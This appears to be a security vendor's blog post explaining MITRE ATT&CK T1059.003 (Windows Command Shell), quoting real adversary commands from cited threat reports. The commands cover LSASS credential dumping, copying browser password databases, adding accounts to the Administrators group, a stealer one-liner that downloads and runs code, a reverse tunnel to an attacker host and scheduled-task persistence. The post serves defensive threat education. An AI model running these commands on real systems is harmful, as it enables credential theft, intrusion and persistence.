T1059.003 Windows Command Shell in MITRE ATT&CK Explained

Sıla Özeren Hacıoğlu | 10 MIN READ

| March 07, 2026

What Is T1059.003 Windows Command Shell in MITRE ATT&CK?

T1059.003 Windows Command Shell is a sub-technique of Command and Scripting Interpreter (T1059) in the MITRE ATT&CK framework, under the Execution tactic. It refers to the use of the Windows Command Shell (cmd.exe), a core component of the Windows operating system, to execute commands and scripts on a host.

The Windows Command Shell provides a text-based interface for interacting with the operating system and supports the execution of batch scripts stored as .bat or .cmd files. These batch files contain sequences of commands that automate repetitive or complex tasks, such as user account management, file operations, or scheduled administrative activities. While commonly used for legitimate system administration, this capability can also be abused for malicious execution.

To read about other sub-techniques of the T1059 Command and Scripting Interpreter technique, you can visit the related hub blog.

Adversary Use of T1059.003 Windows Command Shell

Adversaries use T1059.003 Windows Command Shell to execute malicious commands and scripts by abusing a native and trusted Windows utility. Because cmd.exe is built into all Windows systems, its use can blend into normal activity and evade detection mechanisms focused on third-party tools.

In malicious operations, attackers frequently invoke cmd.exe with the /c parameter, as in cmd.exe /c <command>. This option instructs the command shell to execute the specified command and then immediately terminate. Adversaries leverage this behavior to run single commands, launch scripts, chain execution steps, or trigger follow-on payloads, often as part of phishing, lateral movement, or automated attack workflows.

Procedure Examples Used by Adversaries in Red Report 2026

Administrator Group Modification for Privilege Escalation

Adversaries often add accounts to privileged local groups to gain persistent administrative access and enable remote management or lateral movement.

In a September 2025 analysis of Crypto24 by Picus Security, the malware executed a batch file and ran a series of net localgroup commands that added multiple accounts to high-privilege groups [1]:

cmd.exe /c C:\update.bat
net.exe localgroup administrators john /add
net.exe localgroup administrators service.lot9 /add
net.exe localgroup administrators 00025436 /add
net.exe localgroup "administrators" "NetUser" /add
net.exe localgroup "Remote Desktop Users" "NetUser" /add
net.exe localgroup administrators IT.Guest /add

The sample executes a local batch (C:\update.bat) which contains calls to net.exe localgroup ... /add. Each net localgroup invocation inserts the specified account into the named local group (e.g., Administrators, Remote Desktop Users).

Once added, those accounts inherit group privileges immediately, enabling actions such as service installation, system configuration changes, RDP access, and disabling of protections. Because the commands are native Windows utilities and execute at the OS API level, they leave straightforward audit trails but can grant persistent, high-privilege control quickly.

Checking Admin Privileges by Using SID

Adversaries query local account and group membership to confirm administrative privileges before attempting high-impact actions.

In a February 2025 analysis, CABINETRAT was observed checking whether the current user belongs to the local Administrators group with a simple, fileless command [2]:

cmd.exe /c whoami /groups | findstr /c:"S-1-5-32-544" | findstr /c:"Enabled group"

This command calls whoami /groups to list the account's group SIDs, filters the output for the well-known SID S-1-5-32-544 (Local Administrators), and then checks for the string Enabled group to verify active membership. If the line is present, the process concludes the user has administrative rights.

Attackers use this quick check to decide whether to run privileged actions locally (for example, installing services, altering system settings, or disabling protections) or to attempt privilege escalation via other techniques.

Visual Indicators and System Branding for Psychological Pressure

Adversaries deploy visual changes (wallpaper, icons) to publicly signal compromise and pressure victims.

In a June 2025 analysis, Anubis ransomware was observed extracting embedded branding assets and attempting to set a ransom wallpaper by writing files to C:\ProgramData and modifying the system policy key [3]:

// resource extraction (pseudo)
main.extractEmbeddedAssets() -> writes C:\ProgramData\icon.ico
writes C:\ProgramData\wall.jpg

// attempt to change wallpaper (observed command)
cmd /C reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v Wallpaper /t REG_SZ /d "C:\ProgramData\wall.jpg" /f

The sample drops icon.ico and wall.jpg into C:\ProgramData and then updates the system wallpaper registry key to point at the dumped image. If the file exists and the write succeeds, Windows shows the ransom wallpaper (and custom icons); if the file is missing or permissions are insufficient, the registry change fails and an error is logged.

Attackers use this simple file-write + registry tweak to make the compromise visible, increase victim distress, and pressure victims into paying the ransom.

Procedure Examples Used by Adversaries in Red Report 2025

Credential Dumping (T1003.001)

In November 2024, a CISA advisory detailed how BianLian threat actors utilized a command to dump credentials from the Local Security Authority Subsystem Service (lsass.exe) [4]. By leveraging cmd.exe, the attackers crafted a malicious command that uses legitimate system utilities to extract sensitive information.

Here is the specific command used:

cmd.exe /Q /c for /f "tokens=1,2 delims= "^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\<file>.csv full

This command first identifies the process ID (PID) of lsass.exe using tasklist and filters it with the find utility. It then invokes rundll32.exe to call comsvcs.dll and create a minidump of lsass.exe, storing the dump as a CSV file in the specified directory. The design of the command is intentional, exploiting the ability of rundll32.exe and comsvcs.dll to operate as legitimate Windows tools. This allows the attackers to generate memory dumps that contain sensitive credentials without triggering immediate suspicion.

Downloading and Executing Information Stealers

Adversaries frequently exploit the Windows Command Shell to deliver and execute malicious payloads within compromised environments. In November 2024, security researchers observed the emergence of a new threat, a new version of PXA Infostealer, actively being deployed in the wild [5].

One instance of its deployment involved the execution of the following command:

cmd.exe /c start /min C:\Users\Public\oZHyMUy4qk\synaptics.exe -c import urllib[.]request;import base64;exec(base64.b64decode(urllib[.]request[.]urlopen('hxxps[://]tvdseo[.]com/file/PXA/PXA_BOT').read().decode('utf-8')))

This command uses the start command with the /min flag to launch the malicious payload, synaptics.exe, in a minimized window, reducing the likelihood of detection by the user. The payload then executes a Python script embedded within the command.

The script operates in three stages:

Downloading the Script: It fetches a base64-encoded script from the attacker's server (hxxps[://]tvdseo[.]com/file/PXA/PXA_BOT) using the urllib.request library.
Decoding: The script decodes the fetched base64-encoded content.
Execution: Finally, it executes the decoded script, initiating the PXA stealer's functionality.

This method enables the attacker to deliver and execute complex malware components while masking the malicious activity behind legitimate system utilities.

Gaining Access to Sensitive Data

Adversaries often exploit built-in tools to access sensitive data within compromised environments. In April 2024, a CISA advisory detailed how the Akira ransomware group leveraged system commands to extract user data stored in web browsers like Firefox and Chrome [6]. The following commands were used:

# for Firefox

cmd.exe /Q /c esentutl.exe /y "C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\<firefox_profile_id>.default-release\key4.db" /d

# for Chrome

cmd.exe /Q /c esentutl.exe /y
"C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\Login Data" /d
"C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\Login Data.tmp"

In these commands, the attackers used esentutl.exe, a legitimate database recovery tool built into Windows, to copy database files containing sensitive user data.

Firefox Command:

The command accesses key4.db, a database file used by Firefox to store encrypted credentials, located within the user's Firefox profile directory. This file holds encrypted login information that attackers can decrypt offline.

Chrome Command:

Similarly, this command targets Chrome's Login Data file, which contains encrypted passwords saved within the browser. The attackers not only access this file but also create a .tmp copy for potential manipulation or offline decryption.

Information Discovery & Persistence with Scheduled Tasks

The Interlock ransomware, identified in November 2024, demonstrates a calculated and multifaceted approach to leveraging command-line utilities for malicious purposes [7]. One notable command executed by the Remote Access Tool (RAT) embedded within the fake Chrome browser updater is:

cmd.exe /c systeminfo

This command gathers detailed system information such as OS configuration, physical and virtual memory statistics, and network details. The collected data is encrypted and transmitted to a C2 server for further exploitation. Additionally, the attacker utilizes PowerShell scripts to deploy credential-stealing and keylogging binaries, enhancing their data exfiltration capabilities.

To maintain persistence, the ransomware also employs the schtasks utility:

schtasks /create /sc DAILY /tn "TaskSystem" /tr "cmd /c cd "$Path of the Interlock binary" && "$command"" /st 20:00 /ru system > nul

This task ensures the ransomware runs daily as a SYSTEM user, solidifying its foothold within the victim's network. By employing these commands alongside tactics like lateral movement through RDP and AnyDesk, the attackers exhibit a sophisticated strategy that underscores the critical need for robust endpoint defenses and vigilant monitoring of command-line activities.

Protocol Tunneling (T1572) & Connection Proxy: External Proxy (T1090.003)

The UAT-5647 group, discovered in October 2024, targets Ukrainian and Polish entities, employs advanced malware like RustClaw, DustyHammock, and ShadyHammock, leveraging command-line utilities for system reconnaissance, lateral movement, and data exfiltration. A critical tactic involves tunneling internal systems to attacker-controlled endpoints using the PuTTY's Plink utility, as seen in the following command [8]:

cmd /C %public%\pictures\iestatus[.]exe -pw _passwd_ -batch -hostkey SHA256:_KEY_ -N -R 8080:_IP_IN_INFECTED_NETWORK_:80 root@_ATTACKERS_REMOTE_IP_ -P 7722

This command effectively maps internal ports to external servers, enabling the attackers to bypass traditional network defenses. By exposing internal services through port redirection, UAT-5647 can brute force credentials, monitor network traffic, or exfiltrate sensitive configurations from the compromised infrastructure.

Once inside the network, the attackers shift their focus to reconnaissance. Leveraging PowerShell, they perform ping sweeps to identify active systems within the victim's environment:

1..254 | % {ping n 1 a w 100 192.168.0.$_} | Select-String "\["

This scanning technique allows the threat actors to identify live hosts and prioritize their targets. Following this, they deploy customized batch files, such as nv.bat, to enumerate network shares and identify accessible resources:

net view /all \\192.168.XXX.XXX

With their targets identified, UAT-5647 proceeds to extract data.

Validate Your Defenses Against the Red Report 2026 Threats

References

[1] S. Ö. Hacıoğlu, “Crypto24 Ransomware Uncovered: Stealth, Persistence, and Enterprise-Scale Impact,” Sep. 29, 2025. Available: https://www.picussecurity.com/resource/blog/crypto24-ransomware-uncovered-stealth-persistence-and-enterprise-scale-impact. [Accessed: Nov. 05, 2025]

[2] S. Ö. Hacıoğlu, “CABINETRAT Malware Windows Targeted Campaign Explained,” Oct. 19, 2025. Available: https://www.picussecurity.com/resource/blog/cabinetrat-malware-windows-targeted-campaign-explained. [Accessed: Nov. 03, 2025]

[3] S. Ö. Hacıoğlu, “Anubis Ransomware Targets Global Victims with Wiper Functionality,” Jun. 27, 2025. Available: https://www.picussecurity.com/resource/blog/anubis-ransomware-targets-global-victims-with-wiper-functionality. [Accessed: Nov. 05, 2025]

[4] “#StopRansomware: BianLian Ransomware Group,” Cybersecurity and Infrastructure Security Agency CISA. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a. [Accessed: Dec. 19, 2023]

[5] J. Chen, “New PXA Stealer targets government and education sectors for sensitive information,” Cisco Talos Blog, Nov. 14, 2024. Available: https://blog.talosintelligence.com/new-pxa-stealer/. [Accessed: Nov. 26, 2024]

[6] “Website.” Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a

[7] E. Biasiotto, “Unwrapping the emerging Interlock ransomware attack,” Cisco Talos Blog, Nov. 07, 2024. Available: https://blog.talosintelligence.com/emerging-interlock-ransomware/. [Accessed: Nov. 27, 2024]

[8] D. Korzhevin, “UAT-5647 targets Ukrainian and Polish entities with RomCom malware variants,” Cisco Talos Blog, Oct. 17, 2024. Available: https://blog.talosintelligence.com/uat-5647-romcom/. [Accessed: Nov. 27, 2024]